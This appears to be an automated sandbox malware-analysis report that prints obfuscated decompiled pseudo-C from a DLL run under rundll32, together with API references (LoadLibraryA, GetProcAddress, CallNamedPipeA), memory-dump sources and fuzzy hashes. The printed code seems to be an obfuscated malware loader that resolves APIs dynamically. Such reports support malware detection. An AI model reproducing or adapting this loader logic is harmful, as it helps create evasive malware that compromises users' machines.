                                				 *(_t259 + 0x28) = 0x3666;
                                				 *(_t259 + 0x20) = _t239;
                                				_t143 = E00007FFC7FFC130FF290(0x27ae, 0x343a, _t239, _t250, __r8, __r9, _t277, _t275, _t273, _t271, _t250);
                                				r9d =  *(_t259 + 0xf8);
                                				r8d =  *(_t259 + 0x110);
                                				r11d = _t253 - 0x1956;
                                				r12d = _t250 + 0x1309;
                                				r10d = _t273 + 0x23f6;
                                				r14d = _t273 + 0x30d5;
                                				_t239[0x11e] = _t143;
                                				 *((intOrPtr*)(_t259 + 0x68)) = _t256 + 0x19bd;
                                				 *((intOrPtr*)(_t259 + 0x60)) = _t250 + 0x165d;
                                				r15d = r15d + 0xfffffbb6;
                                				 *(_t259 + 0x58) = r10d;
                                				r9d = r9d + 0xfffffc44;
                                				 *(_t259 + 0x50) = r11d;
                                				r8d = r8d + 0xfffff9e1;
                                				 *(_t259 + 0x48) =  *(_t259 + 0x74) + 0x3189;
                                				 *(_t259 + 0x40) =  *((intOrPtr*)(_t259 + 0x78)) + 0x9db;
                                				 *(_t259 + 0x38) = _t206 + 0x1669;
                                				 *(_t259 + 0x30) = r14d;
                                				 *(_t259 + 0x28) = _t239;
                                				 *(_t259 + 0x20) = r15d;
                                				_t145 = E00007FFC7FFC130E90B0(0x13118090, _t239, _t241, _t246, __r8, __r11);
                                				r14d =  *(_t259 + 0x80);
                                				r8d =  *(_t259 + 0x74);
                                				r11d =  *(_t259 + 0x108);
                                				r8d = r8d + 0x27b2;
                                				r9d =  *(_t259 + 0x70);
                                				r11d =  &(r11d[0x9ed]);
                                				r10d = _t275 + 0x119f;
                                				 *(_t259 + 0xf8) = _t145;
                                				r9d = r9d + 0xfffff951;
                                				 *(_t259 + 0x48) = _t273 + 0x38e9;
                                				 *(_t259 + 0x40) = r8d;
                                				_t262 = _t239;
                                				 *(_t259 + 0x38) = r12d;
                                				 *(_t259 + 0x30) = r10d;
                                				 *(_t259 + 0x28) = r11d;
                                				 *(_t259 + 0x20) =  *((intOrPtr*)(_t259 + 0x78)) + 0xf39;
                                				E00007FFC7FFC130E2390(0x13118090, _t239, _t241, _t246, _t262, _t265, _t271);
                                				r8d =  *(_t259 + 0x70);
                                				r9d =  *(_t259 + 0xd8);
                                				r12d =  *(_t259 + 0x100);
                                				r15d =  *(_t259 + 0xe8);
                                				r11d =  *(_t259 + 0x7c);
                                				r10d =  *(_t259 + 0x88);
                                				if (r12d - _t273 + 0x27b2 >= 0) goto 0x130fa3c0;
                                				if (r13d - _t271 + 0x216 >= 0) goto 0x130fa31a;
                                				r11d = _t250 + 0x526;
                                				r10d = _t262 - 0x526;
                                				 *((intOrPtr*)(_t259 + 0x60)) = _t267 - 0x3c9;
                                				_t205 =  &(_t262[0x644]);
                                				 *(_t259 + 0x58) = r10d;
                                				r15d = _t241 + 0x11ae;
                                				 *(_t259 + 0x50) = r11d;
                                				_t199 =  *((intOrPtr*)(_t259 + 0xd0)) + 0x44a;
                                				 *(_t259 + 0x48) = _t239;
                                				_t209 =  *((intOrPtr*)(_t259 + 0x84)) + 0x4ca;
                                				 *(_t259 + 0x40) = _t199;
                                				r14d = r14d + 0xcdf;
                                				 *(_t259 + 0x38) = _t205;
                                				r9d = r9d + 0x4ca;
                                				 *(_t259 + 0x30) = _t209;
                                				r8d = r8d + 0xfffffde6;
                                				 *(_t259 + 0x28) = r14d;
                                				 *(_t259 + 0x20) = r15d;
                                				E00007FFC7FFC130F75E0(0x13118090, _t241, _t246);
                                				goto 0x130fa47d;
                                				_t242 = _t239[0x80];
                                				if (_t242 != ( *(_t259 + 0xd8) + 0x66c) * _t239[0xf0]) goto 0x130fa340;
                                				_t211 = _t209 & _t239[0xf0] & 0x00003189;
                                				r12d = r12d + _t211;
                                				_t248 = _t239[0x114] & r9d;
                                				if (r13d - _t248 < 0) goto 0x130fa47d;
                                				if (_t239[0x48] - (r15d | _t242) <= 0) goto 0x130fa39c;
                                				r12d = r12d - (r15d | 0x000027b2);
                                				 *_t239 =  *_t239 - _t242;
                                				_t239[0x20] = _t239[0x20] - (_t239[0x88] - 0x000023f6 &  *_t239);
                                				goto 0x130fa3af;
                                				_t239[0xc] = _t239[0xc] ^ _t205 * _t239[0xc4] + _t239[0x3c];
                                				r13d = r13d + 2;
                                				if (r13d - _t248 >= 0) goto 0x130fa366;
                                				goto 0x130fa47d;
                                				if (_t239[0x10c] - _t242 >= 0) goto 0x130fa47d;
                                				r12d =  *(_t259 + 0x70);
                                				asm("o16 nop [eax+eax]");
                                				 *(_t259 + 0x20) = _t239[0x98] | 0x0000228c;
                                				r9d = (_t239[0xa8] & 0x0000ffff) * ( *_t239 & 0x0000ffff) & 0x0000ffff;
                                				r9d = r9d * (r11w & 0xffffffff);
                                				r8d = _t239[0xc4] * r12d * 0x30d5;
                                				CallNamedPipeA(_t253, _t256, ??, ??, ??);
                                				r11d =  *(_t259 + 0x7c);
                                				if (_t199 + 1 - (_t239[0x20] - 0x23f6) * _t211 < 0) goto 0x130fa3f0;
                                				r12d =  *(_t259 + 0x100);
                                				return _t271 + 0xb3d;
                                			}






























                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: CallNamedPipe
                                • String ID: f6$}
                                • API String ID: 1741058652-3232957126
                                • Opcode ID: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction ID: 4a912ea950d157e64f95df2e8f679c6dc8f7e96f2cdfa83a0d30918d97e2c507
                                • Opcode Fuzzy Hash: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                                • Instruction Fuzzy Hash: D9D18B736196C58BD724CF14E4447EABBA8F388758F104129EB8917B98DB7CE695CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 93%
                                			E00007FFC7FFC130E4820(long long __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
                                				void* __rsi;
                                				void* __rbp;
                                				void* __r13;
                                				void* __r15;
                                				signed int _t132;
                                				signed int _t134;
                                				signed int _t168;
                                				signed int _t183;
                                				signed int _t188;
                                				signed int _t190;
                                				signed int _t200;
                                				signed long long _t217;
                                				signed int _t219;
                                				signed long long _t223;
                                				signed long long _t226;
                                				void* _t235;
                                				void* _t237;
                                				void* _t239;
                                				void* _t241;
                                				void* _t242;
                                				void* _t244;
                                				void* _t247;
                                				void* _t248;
                                				long long _t249;
                                				void* _t251;
                                				void* _t253;
                                				signed int _t254;
                                				void* _t256;
                                				CHAR* _t258;
                                				signed long long _t259;
                                
                                				_t247 = __r10;
                                				_t246 = __r9;
                                				_t244 = __r8;
                                				_t221 = __rcx;
                                				_t218 = __rbx;
                                				 *((long long*)(_t241 + 0x10)) = __rbx;
                                				 *(_t241 + 0x20) = r9d;
                                				_push(_t239);
                                				_push(_t237);
                                				_push(_t235);
                                				_push(_t251);
                                				_push(_t253);
                                				_push(_t256);
                                				_t242 = _t241 - 0x80;
                                				r10d = __r9 - 0x3666;
                                				r12d =  *(_t242 + 0xf8);
                                				r14d = __r9 - 0x22c;
                                				 *(_t242 + 0xc0) = r10d;
                                				r8d =  *(_t242 + 0xe8);
                                				_t9 = _t221 - 0x27b2; // 0x0
                                				r8d = r8d + 0xffffee57;
                                				 *(_t242 + 0xd0) = _t9;
                                				 *(_t242 + 0x68) = r8d;
                                				r9d = __rax + 0x1563;
                                				r12d = r12d + 0x984;
                                				r13d = __rax - 0x2103;
                                				 *(_t242 + 0xe8) = r9d;
                                				_t132 = __r10 + 0x23f6;
                                				 *(_t242 + 0x60) = _t132;
                                				if (r9d - _t132 <= 0) goto 0x130e4ab2;
                                				r8d = _t256 - 0x2b1;
                                				r10d = r10d + 0x37e1;
                                				r11d = _t253 + 0x38e9;
                                				_t254 =  *((intOrPtr*)(_t242 + 0x118));
                                				_t21 = _t239 + 0x2598; // 0x2598
                                				 *(_t242 + 0x48) = _t21;
                                				 *(_t242 + 0x40) = _t235 - 0x44a;
                                				r15d = _t256 - 0x11ae;
                                				 *(_t242 + 0x38) = r8d;
                                				_t27 = _t239 + 0x228c; // 0x228c
                                				r9d = _t27;
                                				 *(_t242 + 0x30) = r10d;
                                				 *(_t242 + 0x28) = r15d;
                                				 *(_t242 + 0x20) = r11d;
                                				_t134 = E00007FFC7FFC130FAA10(__rax, __rcx, _t254, __r8, __r9, _t258);
                                				r8d =  *(_t242 + 0xe8);
                                				r10d = _t251 - 0x278;
                                				r12d =  *(_t242 + 0xd0);
                                				_t168 = __rbx - 0x150e;
                                				 *(_t242 + 0x50) = _t168;
                                				r14d = _t134;
                                				 *(_t242 + 0x48) = _t168;
                                				 *(_t242 + 0x40) = _t134 + 0xfffffa6f;
                                				r9d = _t251 + 0x27ae;
                                				r11d = _t237 + 0x189;
                                				 *(_t242 + 0x38) =  *(_t242 + 0x60);
                                				_t200 = _t237 + 0x495;
                                				 *(_t242 + 0x30) = r10d;
                                				 *(_t242 + 0x28) = r11d;
                                				r8d = r8d + 0x283;
                                				 *(_t242 + 0x20) = _t254;
                                				 *(_t242 + 0xf8) = __rbx + 0xf39 - 0x145b;
                                				E00007FFC7FFC130E7120( *(_t242 + 0x100), __rax, __rcx, _t254, __r8, __r9, _t247, _t248);
                                				LoadLibraryA(_t258);
                                				r10d = __rbx + 0x2ad;
                                				r11d = _t251 + 0x37e1;
                                				 *(_t242 + 0x50) = _t200;
                                				 *((long long*)(_t254 + 0x268)) = __rax;
                                				_t58 = _t237 + 0x1270; // 0x1270
                                				_t188 = _t58;
                                				_t60 = _t256 + 0x81; // 0x81
                                				r8d = _t60;
                                				 *((intOrPtr*)(_t254 + 0x120)) =  *((intOrPtr*)(_t254 + 0x120)) + ( *(_t254 + 0x1e0) | 0x0000343a);
                                				r9d = r15d;
                                				 *(_t242 + 0x48) = _t251 + 0x329d;
                                				 *(_t242 + 0x40) = r10d;
                                				 *(_t242 + 0x38) = r11d;
                                				 *(_t242 + 0x30) = _t235 + 0x1011;
                                				 *(_t242 + 0x28) = _t188;
                                				 *(_t242 + 0x20) = _t254;
                                				E00007FFC7FFC130E2730( *(_t254 + 0x1e0) | 0x0000343a, __rbx, _t254 + 0x160, _t237, _t244);
                                				r8d =  *(_t242 + 0xd8);
                                				_t71 = _t256 - 0x1270; // -4720
                                				r10d =  *(_t242 + 0xc0);
                                				 *(_t242 + 0x48) = r8d;
                                				_t75 = _t256 - 0xeb4; // -3764
                                				r11d = _t75;
                                				 *(_t242 + 0x40) = _t71;
                                				_t77 = _t237 + 0xcdf; // 0xcdf
                                				r9d = _t77;
                                				 *(_t242 + 0x38) = _t251 + 0x2103;
                                				r10d = r10d + 0x3a59;
                                				 *(_t242 + 0x30) = r10d;
                                				 *(_t242 + 0x28) = r11d;
                                				 *(_t242 + 0x20) = _t244 + 0x3f3;
                                				E00007FFC7FFC130E1000( *(_t254 + 0x1e0) | 0x0000343a, _t218, _t254 + 0x160, _t237, _t254, _t246);
                                				goto 0x130e4c65;
                                				_t219 =  *((intOrPtr*)(_t242 + 0x118));
                                				_t259 = r12d;
                                				if ( *((intOrPtr*)(_t219 + 0x80)) -  *(_t219 + 0x48) * _t259 > 0) goto 0x130e4ae9;
                                				if (r12d - (r8d & r12d) > 0) goto 0x130e4ae9;
                                				_t223 = r10d;
                                				 *(_t242 + 0x60) = _t223;
                                				if (_t259 - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^ _t223) > 0) goto 0x130e4c5f;
                                				_t183 = r9d ^ r12d;
                                				 *(_t242 + 0xd8) = _t183;
                                				_t249 = r9d * 0x36e7;
                                				 *((long long*)(_t242 + 0x70)) = _t249;
                                				 *(_t242 + 0x100) = r14d | 0x00001f2c;
                                				asm("o16 nop [eax+eax]");
                                				r8d = r8d *  *(_t219 + 0x40);
                                				_t217 =  *(_t219 + 0xc8) + _t249;
                                				r11d =  *(_t219 + 0x1c0);
                                				r11d = r11d + 0x1f2c;
                                				_t226 = r13d & _t259 ^ _t217;
                                				_t190 = _t188 * ( *(_t219 + 0x120) * r12d +  *((intOrPtr*)(_t219 + 0x60))) | r14d -  *((intOrPtr*)(_t219 + 0x110));
                                				 *(_t219 + 0xc8) = _t226;
                                				 *(_t242 + 0xf8) = _t190;
                                				r13d = r13d |  *(_t219 + 0x188) | _t183;
                                				r10d = _t217 + _t226;
                                				r9d =  *(_t242 + 0x100);
                                				 *(_t242 + 0x48) = ( *(_t219 + 0x1b8) | 0x0000343a) & r9d;
                                				r9d = r9d & _t200;
                                				 *(_t242 + 0x40) = _t219;
                                				 *(_t242 + 0x38) = r10d;
                                				 *(_t242 + 0x30) = r11d;
                                				 *(_t242 + 0x28) = _t190 &  *(_t219 + 0x150) & 0x00002032;
                                				 *(_t242 + 0x20) = r10d -  *((intOrPtr*)(_t219 + 0x218));
                                				E00007FFC7FFC130F98F0(_t254 + 0x00003a59 & r14d, _t217, _t254, _t254, _t246, _t254);
                                				r12d = r12d + 4;
                                				 *(_t219 + 0x150) =  *(_t219 + 0x150) + _t226 - ( *(_t219 + 0xd8) ^  *(_t219 + 0x30));
                                				r9d =  *(_t242 + 0xe8);
                                				r10d =  *(_t242 + 0xc0);
                                				r8d =  *(_t242 + 0x68);
                                				if (r12d - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^  *(_t242 + 0x60)) <= 0) goto 0x130e4b40;
                                				goto 0x130e4c65;
                                				_t129 = _t239 + 0x3595; // 0x3595
                                				return _t129;
                                			}

                                APIs
                                • LoadLibraryA.KERNEL32 ref: 00007FFC130E49B4
                                  • Part of subcall function 00007FFC130E2730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FFC130E4A40), ref: 00007FFC130E285E
                                  • Part of subcall function 00007FFC130E1000: GetProcAddress.KERNEL32 ref: 00007FFC130E10D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: 62 $662
                                • API String ID: 2238633743-980518382
                                • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction ID: 0e9f889a9c7703fea28eae440d8edf1887b3426929f3d104db7ca2830befe457
                                • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                                • Instruction Fuzzy Hash: AEB18C776186C58BD365CF24E484BDEBBA8F788788F004125EB8957B58DB38EA54CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: @
                                • API String ID: 3000768030-2766056989
                                • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction ID: 6415c3513bfa0acc29d9b14b9bef021f32f128830bf2c6f512498d681071529e
                                • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                                • Instruction Fuzzy Hash: B621F922A08F6A42FB64CB259D9013826D5EF45778F240375D6AE277D4CE3DE891D310
                                Uniqueness

                                Uniqueness Score: -1.00%